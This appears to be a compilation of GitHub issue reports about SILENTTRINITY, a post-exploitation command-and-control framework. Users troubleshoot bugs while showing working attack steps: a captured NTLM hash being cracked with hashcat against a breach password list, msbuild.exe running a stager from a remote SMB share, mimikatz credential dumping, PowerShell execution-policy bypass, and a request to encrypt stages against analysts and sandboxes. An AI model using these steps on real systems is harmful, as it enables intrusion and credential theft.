S-1-5-21-2347759232-2198512603-1203408765-1000 RuntimeBroker
Impersonated user DESKTOP-2LDSJOS\sysadmin
sysadmin::DESKTOP-2LDSJOS:ec9363e3376248774cfccdfdb943ca96:01010000000000009a947f08f968d5019ef9ce3189e3fb3c00000000080030003000000000000000010000000020000058bb58d0a2bb73feee5a25dd573383f3472c272d8aa58d421695b376ded1cd930a00100000000000000000000000000000000000090030004400450053004b0054004f0050002d0032004c00440053004a004f0053005c00730079007300610064006d0069006e000000000000000000:1122334455667788
Restoring NTLM values
Trying to crack that hash with hashcat:
jeff@blue:~/dev/SILENTTRINITY$ sudo hashcat -m 5500 /tmp/ntlmv1.txt /opt/Passwords/breachcompilationuniq.txt -O -w4 --force 2>/dev/null| grep Token
Hashfile '/tmp/ntlmv1.txt' on line 1 (sysadm...64006d0069006e000000000000000000): Token length exception
Per hashcat documentation, the challenge in the NTLMv2 hash is in the wrong place as output by the internalmonologue attack. The fix is to put it after the computer name, as follows:
jeff@blue:~/dev/SILENTTRINITY$ cat /tmp/hash
sysadmin::DESKTOP-2LDSJOS:1122334455667788:ec9363e3376248774cfccdfdb943ca96:01010000000000009a947f08f968d5019ef9ce3189e3fb3c00000000080030003000000000000000010000000020000058bb58d0a2bb73feee5a25dd573383f3472c272d8aa58d421695b376ded1cd930a00100000000000000000000000000000000000090030004400450053004b0054004f0050002d0032004c00440053004a004f0053005c00730079007300610064006d0069006e000000000000000000
Shown above.
boo/internalmonologue module.
I can provide more information if needed, but I think the above is enough to replicate this from scratch.
I installed .NET Core the other day on macOS and it seems to be pretty straightforward. Plus there seem to be packages for it for almost every *nix OS that I'd ever use (including Arch!).
I set up Silent Trinity on Kali and retrieved all the requirements with pip. Launched st.py with python3 successfully.
Set up a listener and a stager using msbuild. Transferred the msbuild.xml to the target box and launched it with MSBuild.exe.
I get the error:
Error downloading https:///stage.zip: The underlying connection was closed: An unexpected error occurred on a send.
It does not seem to be able to fetch the stager, and the Windows box is on the same network as the listener box.
run module ipy/mimikatz without generating an exception
Launching the build on the Windows target system sometimes generates a 'HMAC not valid' exception:
File "/root/SILENTTRINITY/Server/core/crypto.py", line 99, in decrypt
raise CryptoException("HMAC not valid")
Sometimes creating the session works, and then running the ipy/mimikatz module raises the same exception.
Often everything works fine.
After the error occurs, the module will not run.
Start Silent Trinity
cd SILENTTRINITY/Server/
python3.7 st.py -d
Start http Listener
listeners
use http
start
# run the following in a command shell:
\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe \\192.168.88.128\SMB\msbuild.xml
# wait for the new session
sessions
modules
use ipy/mimikatz
run all
Holla at you dudettes,
First of all, a big thank you for your great work on the readme.md; it helped me to understand all of this in a couple of minutes.
I have a feature request on the zip-file exchange:
In my opinion it would make sense for the zip blob to be encrypted server-side before sending it to the C# agent.
If the ZIP file is fetched by a sandbox or by an analyst, it is useless without the key, which may be implemented in the binary.
Hope I can contribute to this project in the near future 👍
hey,
I have just tested your great tool and I have to say that I like it very much! Good job!
But it would be helpful if it had the ability to stop individual sessions and listeners.
Thank you very much!
ST ≫ listeners
ST (listeners) ≫ use http
ST (listeners)(http) ≫ set BindIP 10.0.0.113
ST (listeners)(http) ≫ set Port 5000
ST (listeners)(http) ≫ start
[+] Listener 'http' started successfully!
ST (listeners)(http) ≫ Running on https://10.0.0.113:5000 (CTRL + C to quit)
ST (listeners)(http) ≫ stagers
ST (stagers) ≫ list
Available
+---------+--------------------------------------+
| Name    | Description                          |
+---------+--------------------------------------+
| wmic    | Stage via wmic XSL execution         |
+---------+--------------------------------------+
| msbuild | Stage via MSBuild XML inline C# task |
+---------+--------------------------------------+
ST (stagers) ≫ use msbuild
ST (stagers)(msbuild) ≫ options
+-------------+----------+-------+-------------+
| Option Name | Required | Value | Description |
+-------------+----------+-------+-------------+
ST (stagers)(msbuild) ≫ generate http
[+] Generated stager to msbuild.xml
[*] Launch with 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuild.xml'
ST (stagers)(msbuild) ≫ [2019-01-17 10:08:16,259] ERROR in app: Exception on request GET /stage.zip
Traceback (most recent call last):
File "/usr/local/lib/python3.6/dist-packages/quart/app.py", line 1436, in handle_request
return await self.full_dispatch_request(request_context)
Hello
Is it possible to run with a Public IP?
I tried with some options but I was getting connection issues during the staging process.
Thanks
In the description it says that .NET 4.5 is needed to run the stager and the payloads. The Python web server throws a "no shared cipher" error. Is this something odd to do with Windows 8.1 Embedded? I am going to throw a Console.WriteLine in the inline C# stager and see if I can get any other info.
The generated msbuild.res file works correctly.
The generated msbuild.res file is broken.
A newline character is missing.
git clone https://github.com/byt3bl33d3r/SILENTTRINITY.git
cd SILENTTRINITY/Server
pipenv install
pipenv shell
stvenom.py msbuild http 8089 --ip 10.10.10.1
Unknown command 'startmodules'
Since we got Pypykatz working with the minidump module now, it would be nice to have a database to store the creds we get instead of just outputting them to the screen. Since I'm gonna want ST to work with CrackMapExec, we might want to make sure the databases are compatible with each other.
Hello,
Using ST I'm getting this error:
(SILENTTRINITY) bash-3.2$ python3 teamserver.py IP password
2019-08-11 08:14:41,969 32363 IPCServer - [DEBUG] ipcserver.py: run - Started IPC server on 127.0.0.1:64200
2019-08-11 08:14:42,013 32363 MainThread - [DEBUG] selector_events.py: init - Using selector: KqueueSelector
2019-08-11 08:14:42,184 32363 MainThread - [ERROR] loader.py: get_loadables - Failed loading listener core/teamserver/listeners/dns.py: No module named 'core.thirdparty'
2019-08-11 08:14:42,334 32363 MainThread - [DEBUG] loader.py: get_loadables - Loaded 4 listener(s)
2019-08-11 08:14:42,335 32363 MainThread - [DEBUG] ipcserver.py: attach - Attaching event: KEY_EXCHANGE -> Sessions.kex
2019-08-11 08:14:42,335 32363 MainThread - [DEBUG] ipcserver.py: attach - Attaching event: ENCRYPT_STAGE -> Sessions.gen_encrypted_stage
2019-08-11 08:14:42,335 32363 MainThread - [DEBUG] ipcserver.py: attach - Attaching event: SESSION_STAGED -> Sessions.notify_session_staged
2019-08-11 08:14:42,335 32363 MainThread - [DEBUG] ipcserver.py: attach - Attaching event: SESSION_CHECKIN -> Sessions.session_checked_in
2019-08-11 08:14:42,335 32363 MainThread - [DEBUG] ipcserver.py: attach - Attaching event: NEW_JOB -> Sessions.add_job
2019-08-11 08:14:42,335 32363 MainThread - [DEBUG] ipcserver.py: attach - Attaching event: JOB_RESULT -> Sessions.job_result
2019-08-11 08:14:42,342 32363 MainThread - [DEBUG] loader.py: get_loadables - Loaded 12 module(s)
2019-08-11 08:14:42,342 32363 MainThread - [DEBUG] ipcserver.py: attach - Attaching event: GET_STAGERS -> Stagers.get_stagers
2019-08-11 08:14:42,344 32363 MainThread - [DEBUG] loader.py: get_loadables - Loaded 3 stager(s)
2019-08-11 08:14:42,410 32363 MainThread - [WARNING] teamserver.py: server - Teamserver certificate fingerprint: 6e83733b2d06b0b3efe60e9c0bd741b65eb975c0d9f3eee511f4d1a676bc1afc
2019-08-11 08:14:42,411 32363 MainThread - [INFO] teamserver.py: server - Teamserver started on IP:5000
I see this failed:
Failed loading listener core/teamserver/listeners/dns.py: No module named 'core.thirdparty'
Using a MacBook Pro:
Model Name: MacBook Pro
Model Identifier: MacBookPro15,3
Processor Name: Intel Core i9
Processor Speed: 2.9 GHz
Number of Processors: 1
Total Number of Cores: 6
L2 Cache (per Core): 256 KB
L3 Cache: 12 MB
Hyper-Threading Technology: Enabled
Memory: 32 GB
Boot ROM Version: 220.270.99.0.0 (iBridge: 16.16.6568.0.0,0)
System Version: macOS 10.14.6 (18G87)
Kernel Version: Darwin 18.7.0
Boot Volume: Macintosh HD
Boot Mode: Normal
Anyone else getting this error?
Wondering why exactly Python 3.7 is needed. Any thoughts? Thanks.
Hello, I believe I have found a bug in the recent SILENTTRINITY release.
Context
SILENTTRINITY Version: Zuiikin 0.4.0dev
OS running the Client: Arch Linux
Python version running the Client: 3.7.4
OS running the TeamServer: Arch Linux
Python version running the Teamserver: 3.7.4
Expected Behavior
Executing a provided .NET assembly from a host machine should give me the output of said assembly running on the victim machine.
For example:
set Assembly /home/user/Downloads/Seatbelt.exe
set Arguments all
run all
Current Behavior
No desired output is returned, instead ST errors with:
[*] [TS-eZ8mR] d7b81c90-e6e4-458c-9505-b5aeb4ec73cb returned job result (id: YE0hRRzQwY)
Error compiling source:
YE0hRRzQwY.boo(11,12): BCE0048: Type 'System.Type' does not support slicing.
YE0hRRzQwY.boo(11,27): BCE0048: Type 'System.Type' does not support slicing.
Failure Information
See the screenshot for detailed DEBUG information:
Steps to Reproduce
After installing, pipenv, etc., launch the teamserver: python3 teamserver.py 192.168.1.141 pass
Connect the client C&C to the teamserver: python3 st.py wss://username:[email protected]:5000
Set up a listener: listeners, use https, options, start https
Set up a stager: stagers, use powershell, generate https
Copy stager.ps1 to windows victim machine
Execute the stager: powershell -ep bypass .\stager.ps1
Get a session, set up the execute-assembly module and run all.
...
Legacy release works as expected. Please let me know if you need more information and thank you once again for all your time and effort you put into this project.